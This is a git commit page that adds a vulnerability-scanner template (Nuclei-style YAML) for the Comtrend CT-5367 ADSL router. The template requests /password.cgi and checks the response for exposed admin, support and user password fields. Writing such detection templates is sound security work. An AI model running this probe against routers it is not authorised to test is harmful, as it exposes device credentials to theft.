Create comtrend-ct5367-disclosure.yaml

patch-1
Prince Chaddha 2021-08-19 14:45:37 +05:30 committed by GitHub
parent bb1825eeaa
commit 33ea2d360c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: comtrend-ct5367-rce
info:
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
author: geeknik
severity: high
reference: https://www.exploit-db.com/exploits/16275
tags: router,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/password.cgi"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "pwdAdmin ="
- "pwdSupport ="
- "pwdUser ="
condition: and